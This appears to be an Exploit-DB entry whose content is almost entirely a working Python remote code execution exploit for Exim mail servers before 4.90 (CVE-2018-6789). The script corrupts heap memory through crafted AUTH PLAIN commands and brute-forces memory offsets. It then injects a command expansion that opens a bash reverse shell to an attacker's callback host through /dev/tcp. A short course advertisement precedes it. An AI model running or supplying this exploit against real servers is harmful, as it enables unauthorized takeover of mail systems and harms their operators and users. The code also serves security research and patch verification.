exim 4.90 - Remote Code Execution

EDB-ID:

45671


Author:

hackk.gr

Type:

remote


Platform:

Linux

Date:

2018-10-24


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux , the course required to become an Offensive Security Certified Professional (OSCP)

GET CERTIFIED

# Exploit Title: exim 4.90 - Remote Code Execution
# Date: 2018-10-24
# Exploit Author: hackk.gr
# Vendor Homepage: exim.org
# Version: exim < 4.90
# Tested on: debian exim 4.89, ubuntu exim 4.86_2
# CVE : CVE-2018-6789

#!/usr/bin/python
#debian exim 4.89
#ubuntu exim 4.86_2
import time
import socket
import struct
import os
import os.path
import sys
import ssl
import random
from multiprocessing import Process, Queue

s = None
f = None
test = True
rcpt_index_start = 0x120
bufsize = 8200

def connect(host, port):
   global s
   global f
   s = socket.create_connection((host,port))
   f = s.makefile("rw", bufsize=0)

def p(v):
   return struct.pack("<Q", v)

def readuntil(delim='\n'):
   data = ''
   auth_plain_available = False
   while True:
    
    l = f.readline()
    if l == "":
      return ""
      
    if l.find("PLAIN") > -1:
      auth_plain_available = True    
      
    if test:
      if len(l) > 70:
       sys.stdout.write(l[:70] + " ...\n")
       sys.stdout.flush()
      else:
       print l.strip("\r").strip("\n")
      
    data = data + l
    if data.find(delim) > -1:
     return data
    if l == "\n" or l == "":
     return ""
   return data

def write(data):
   f.write(data + "\n")
def ehlo(v):
   write("EHLO " + v)
   return readuntil('HELP')
def unrec(v):
   write(v)
   readuntil('command')
def auth_plain(v):
   encode = v.encode('base64').replace('\n','').replace('=','')
   write("AUTH PLAIN " + encode)
   l = f.readline()
   if test:
    if l.find("not advert") > -1 or l.find("not supported")> -1:
     raise Exception("NO AUTH PLAIN CONFIG")
    print l
def auth_plain1(v):
   encode = v.encode('base64').replace('\n','').replace('=','')
   write("AUTH PLAIN " + encode)
   l = f.readline()
   if test:
    if l.find("Incorrect") > -1:
     raise Exception("WRONG DRIVER")
    if l.find("not advert") > -1 or l.find("not supported")> -1:
     raise Exception("NO AUTH PLAIN CONFIG")
    print l
def auth_plain2(v,value):
   encode = v.encode('base64').replace('\n','').replace('=','')
   value = chr(value).encode('base64').replace('\n','').replace('=','')
   write("AUTH PLAIN " + encode[:-1] + value)
   l = f.readline()
   if test:
    if l.find("Incorrect") > -1:
     raise Exception("WRONG DRIVER")
    if l.find("not advert") > -1 or l.find("not supported")> -1:
     raise Exception("NO AUTH PLAIN CONFIG")
    print l
def one_byte_overwrite():
   v = "C" * bufsize
   encode = v.encode('base64').replace('\n','').replace('=','')
   encode = encode[:-1] + "PE"
   write("AUTH PLAIN " + encode)
   l = f.readline()
   if test:
    if l.find("Incorrect") > -1:
     raise Exception("WRONG DRIVER")
    if l.find("not advert") > -1 or l.find("not supported")> -1:
     raise Exception("NO AUTH PLAIN CONFIG")
    print l

lookup_table = {0x00: [0,3],
0x01: [0,7],
0x02: [0,11],
0x03: [0,15],
0x04: [0,19],
0x05: [0,23],
0x06: [0,27],
0x07: [0,31],
0x08: [0,35],
0x09: [0,39],
0x0a: [0,43],
0x0b: [0,47],
0x0c: [0,51],
0x0d: [0,55],
0x0e: [0,59],
0x0f: [0,63],
0x10: [0,67],
0x11: [0,71],
0x12: [0,75],
0x13: [0,79],
0x14: [0,83],
0x15: [0,87],
0x16: [0,91],
0x17: [0,95],
0x18: [0,99],
0x19: [0,103],
0x1a: [0,107],
0x1b: [0,111],
0x1c: [0,115],
0x1d: [0,119],
0x1e: [0,123],
0x1f: [0,127],
0x20: [0,131],
0x21: [0,135],
0x22: [0,139],
0x23: [0,143],
0x24: [0,147],
0x25: [0,151],
0x26: [0,155],
0x27: [0,159],
0x28: [0,163],
0x29: [0,167],
0x2a: [0,171],
0x2b: [0,175],
0x2c: [0,179],
0x2d: [0,183],
0x2e: [0,187],
0x2f: [0,191],
0x30: [0,195],
0x31: [0,199],
0x32: [0,203],
0x33: [0,207],
0x34: [0,211],
0x35: [0,215],
0x36: [0,219],
0x37: [0,223],
0x38: [0,227],
0x39: [0,231],
0x3a: [0,235],
0x3b: [0,239],
0x3c: [0,243],
0x3d: [0,247],
0x3e: [0,251],
0x3f: [0,254],
0x40: [64,3],
0x41: [64,7],
0x42: [64,11],
0x43: [64,15],
0x44: [64,19],
0x45: [64,23],
0x46: [64,27],
0x47: [64,31],
0x48: [64,35],
0x49: [64,39],
0x4a: [64,43],
0x4b: [64,47],
0x4c: [64,51],
0x4d: [64,55],
0x4e: [64,59],
0x4f: [64,63],
0x50: [64,67],
0x51: [64,71],
0x52: [64,75],
0x53: [64,79],
0x54: [64,83],
0x55: [64,87],
0x56: [64,91],
0x57: [64,95],
0x58: [64,99],
0x59: [64,103],
0x5a: [64,107],
0x5b: [64,111],
0x5c: [64,115],
0x5d: [64,119],
0x5e: [64,123],
0x5f: [64,127],
0x60: [64,131],
0x61: [64,135],
0x62: [64,139],
0x63: [64,143],
0x64: [64,147],
0x65: [64,151],
0x66: [64,155],
0x67: [64,159],
0x68: [64,163],
0x69: [64,167],
0x6a: [64,171],
0x6b: [64,175],
0x6c: [64,179],
0x6d: [64,183],
0x6e: [64,187],
0x6f: [64,191],
0x70: [64,195],
0x71: [64,199],
0x72: [64,203],
0x73: [64,207],
0x74: [64,211],
0x75: [64,215],
0x76: [64,219],
0x77: [64,223],
0x78: [64,227],
0x79: [64,231],
0x7a: [64,235],
0x7b: [64,239],
0x7c: [64,243],
0x7d: [64,247],
0x7e: [64,251],
0x7f: [64,254],
0x80: [128,3],
0x81: [128,7],
0x82: [128,11],
0x83: [128,15],
0x84: [128,19],
0x85: [128,23],
0x86: [128,27],
0x87: [128,31],
0x88: [128,35],
0x89: [128,39],
0x8a: [128,43],
0x8b: [128,47],
0x8c: [128,51],
0x8d: [128,55],
0x8e: [128,59],
0x8f: [128,63],
0x90: [128,67],
0x91: [128,71],
0x92: [128,75],
0x93: [128,79],
0x94: [128,83],
0x95: [128,87],
0x96: [128,91],
0x97: [128,95],
0x98: [128,99],
0x99: [128,103],
0x9a: [128,107],
0x9b: [128,111],
0x9c: [128,115],
0x9d: [128,119],
0x9e: [128,123],
0x9f: [128,127],
0xa0: [128,131],
0xa1: [128,135],
0xa2: [128,139],
0xa3: [128,143],
0xa4: [128,147],
0xa5: [128,151],
0xa6: [128,155],
0xa7: [128,159],
0xa8: [128,163],
0xa9: [128,167],
0xaa: [128,171],
0xab: [128,175],
0xac: [128,179],
0xad: [128,183],
0xae: [128,187],
0xaf: [128,191],
0xb0: [128,195],
0xb1: [128,199],
0xb2: [128,203],
0xb3: [128,207],
0xb4: [128,211],
0xb5: [128,215],
0xb6: [128,219],
0xb7: [128,223],
0xb8: [128,227],
0xb9: [128,231],
0xba: [128,235],
0xbb: [128,239],
0xbc: [128,243],
0xbd: [128,247],
0xbe: [128,251],
0xbf: [128,254],
0xc0: [192,3],
0xc1: [192,7],
0xc2: [192,11],
0xc3: [192,15],
0xc4: [192,19],
0xc5: [192,23],
0xc6: [192,27],
0xc7: [192,31],
0xc8: [192,35],
0xc9: [192,39],
0xca: [192,43],
0xcb: [192,47],
0xcc: [192,51],
0xcd: [192,55],
0xce: [192,59],
0xcf: [192,63],
0xd0: [192,67],
0xd1: [192,71],
0xd2: [192,75],
0xd3: [192,79],
0xd4: [192,83],
0xd5: [192,87],
0xd6: [192,91],
0xd7: [192,95],
0xd8: [192,99],
0xd9: [192,103],
0xda: [192,107],
0xdb: [192,111],
0xdc: [192,115],
0xdd: [192,119],
0xde: [192,123],
0xdf: [192,127],
0xe0: [192,131],
0xe1: [192,135],
0xe2: [192,139],
0xe3: [192,143],
0xe4: [192,147],
0xe5: [192,151],
0xe6: [192,155],
0xe7: [192,159],
0xe8: [192,163],
0xe9: [192,167],
0xea: [192,171],
0xeb: [192,175],
0xec: [192,179],
0xed: [192,183],
0xee: [192,187],
0xef: [192,191],
0xf0: [192,195],
0xf1: [192,199],
0xf2: [192,203],
0xf3: [192,207],
0xf4: [192,211],
0xf5: [192,215],
0xf6: [192,219],
0xf7: [192,223],
0xf8: [192,227],
0xf9: [192,231],
0xfa: [192,235],
0xfb: [192,239],
0xfc: [192,243],
0xfd: [192,247],
0xfe: [192,251],
0xff: [192,254],
} 

def exploit(b1, b2, b3, rcpt_index, target, cb, cbport):
   global s
   global f

   #if c % 0x50 == 0:
   # print " byte1=0x%02x byte2=0x%02x byte3=0x%02x rcpt_index=0x%02x" % (b1, b2, b3, rcpt_index)
   
   try:
    connect(target, 25)
   except:
    raise Exception("CONNECTION ERROR")
   
   banner = f.readline()
   if test:
    print banner.strip("\r").strip("\n")

   ehlo("A" * 8000)
   
   ehlo("B" * 16)
   
   unrec("\xff" * 2000)
   ehlo("D" * bufsize)
   one_byte_overwrite()
    
   fake_header  = p(0) 
   fake_header += p(0x1f51)
   res = auth_plain1("E" * 176 + fake_header + "E" * (bufsize-176-len(fake_header)))
   
   res = ehlo("F" * 16)
   if res == "":
   	raise Exception("CRASHED")
   
   unrec("\xff" * 2000)
   unrec("\xff" * 2000)

   fake_header  = p(0x4110)
   fake_header += p(0x1f50)
   auth_plain("G" * 176 + fake_header + "G" * (bufsize-176-len(fake_header)))
   
   auth_plain2('A'* (bufsize) + p(0x2021) + chr(b1) + chr(b2) + chr(lookup_table[b3][0]), lookup_table[b3][1])
   res = ehlo("I" * 16)
      
   if res == "":
    s.close()
    f.close()
    raise Exception("EHLO(I)")

   acl_smtp_rcpt_offset = rcpt_index
   local_host = cb
   local_port = cbport
   cmd = "/usr/bin/setsid /bin/bash -c \"/bin/bash --rcfile <(echo 'echo " + "0x%02x " % b1 + "0x%02x " % b2 + "0x%02x " % b3 + "0x%04x " % rcpt_index + "') -i >& /dev/tcp/" + local_host + "/" + str(local_port) + " 0>&1\""
   cmd_expansion_string = "${run{" + cmd + "}}\0"

   auth_plain("J" * acl_smtp_rcpt_offset + cmd_expansion_string + "\x00")# * (bufsize - acl_smtp_rcpt_offset - len(cmd_expansion_string))) 

   write("MAIL FROM:<postmaster@localhost>")

   res = f.readline()

   if res != "":
    if test:
     raise Exception("NO TARGET")
    raise Exception("OFFSET")

   raise Exception("BYTE")
 
   write("RCPT TO:<postmaster@localhost>")   
   readuntil("Accepted")
    
   write("RCPT TO:<postmaster@localhost>")
   if f.readline() == "":
    s.close()
    f.close()
    raise Exception("RCPT TO")

def checkvuln(host):
 try:
  exploit(0xff, 0xff, 0xff, rcpt_index_start, host, "127.0.0.1", "1337")
 except Exception as e:
  print e
  if str(e) == "EHLO(I)":
   return True
 return False

def _exploit(b1, b2, b3, rcpt_index, target, cb, cbport, q):
 if b1 > 0xff or b2 > 0xff or b3 > 0xff:
  q.put([b1,b2,b3,"VALUE"])
  return
 try:
  exploit(b1, b2, b3, rcpt_index, target, cb, cbport)
 except Exception as e:
  e = str(e)
  if e == "[Errno 104] Connection reset by peer" or e.find("EOF occurred") > -1:
    e = "BYTE"
  q.put([b1,b2,b3,e])
  
if __name__ == '__main__':
 if len(sys.argv) < 4:
  print "%s <cb> <cbport> <target>" % sys.argv[0]
  sys.exit(1)
  
 target = sys.argv[3]
 cb = sys.argv[1]
 cbport = sys.argv[2]

 if len(sys.argv) == 8:
  print "reuse fixed offsets"
  b1 = int(sys.argv[4], 16)
  b2 = int(sys.argv[5], 16)
  b3 = int(sys.argv[6], 16)
  rcpt_index = int(sys.argv[7], 16)

  try:
    exploit(b1, b2, b3, rcpt_index, target, cb, cbport)
  except Exception as e:
    print e
  sys.exit(1)

 print "check vuln"
 if not checkvuln(target):
  print "false"
  sys.exit(1)

 print "true"
 test=False

 allbytes = [offset for offset in xrange(0, 0x110)]
 allbytes_10 = [offset for offset in xrange(0x10, 0x110, 0x10)]
 b3_survived = []
 
 b3_survived_stop = False
 tested = []
 try:
   q = Queue()
   procs = []
   print
   print "Discover first byte in offset"
   print
   sys.stdout.write("Try Offsets %02x%02x%02x to %02x%02x%02x ..." % (0x00,0xff,0xff,0xff,0xff,0xff))
   for b3 in allbytes:
     if b3 % 0x10 == 0 and b3 <= 0xff:
      sys.stdout.write("\rTry Offsets %02x%02x%02x to %02x%02x%02x ..." % (b3,0xff,0xff,0xff,0xff,0xff))
     
     b1 = 0x00
     
     for b2 in allbytes_10:
      proc = Process(target=_exploit, args=(b1, b2, b3, rcpt_index_start, target, cb, cbport, q))
      procs.append(proc)
      proc.daemon = True
      proc.start()
     
      to_break = False
      if len(procs) == 16:
       for i in xrange(0,16):
         result = q.get()
         if result[3] == "BYTE":
           if [b3, b2] not in tested:
            tested.append([b3, b2])
            b3_survived.append(result[2])
            sys.stdout.write("\nOffset %02x%02x%02x Survived ..." % (result[2],result[1],result[0]))
           else:
            to_break = True
       
       procs[:] = []
       if to_break:
        break
   
   print "\n"
   print "Discover offsets for rcpt index brute force ..."
   print
   b1_survived = {}
   for b3 in b3_survived:
    for b2 in allbytes:
     if b2 % 0x10 == 0 and b2 <= 0xff:
      sys.stdout.write("\r\r\nTry Offsets %02x%02x%02x to %02x%02x%02x ... " % (b3,b2,0x00,b3,0xff,0xf0))
     for b1 in allbytes_10:
       proc = Process(target=_exploit, args=(b1, b2, b3, rcpt_index_start, target, cb, cbport, q))
       procs.append(proc)
       proc.daemon = True
       proc.start()

       if len(procs) == 16:
        for i in xrange(0,16):
          result = q.get()
          if result[3] == "OFFSET":
           if result[2] not in b1_survived:
             b1_survived[result[2]] = []
           b1_survived[result[2]].append(result)
           sys.stdout.write("\n%02x%02x%02x Survived ..." % (result[2],result[1],result[0]))
            
        procs[:] = []
   
   iteration_list = [n for n in xrange(0x100,0x1000,0x10)]
   iteration_list2 = [n for n in xrange(0x1000,0x3000,0x100)]

   for n in iteration_list2:
        iteration_list.append(n)

   b1_survived_priority = []
   b1_survived_additional = []

   for key in sorted(b1_survived):
    if len(b1_survived[key]) < 7:
      b1_survived_priority.append(b1_survived[key])
    else:
      b1_survived_additional.append(b1_survived[key])

   _b1_survived = []
   for result in b1_survived_priority:
    _b1_survived.append(result)
   for result in b1_survived_additional:
    _b1_survived.append(result)

   print "\n"
   print "Start rcpt index brute force ..."
   print

   for result in _b1_survived:
    for s in result:
     sys.stdout.write("\rTry Offset %02x%02x%02x with rcpt index from 0x100 to 0x3000 ..." % (s[2],s[1],s[0]))
     for rcpt_index in iteration_list:
       proc = Process(target=_exploit, args=(s[0], s[1], s[2], rcpt_index, target, cb, cbport, q))
       procs.append(proc)
       proc.daemon = True
       proc.start()

       if len(procs) == 16:
        for i in xrange(0,16):
         q.get()

        procs[:] = []
 except KeyboardInterrupt:
  pass

 print "done."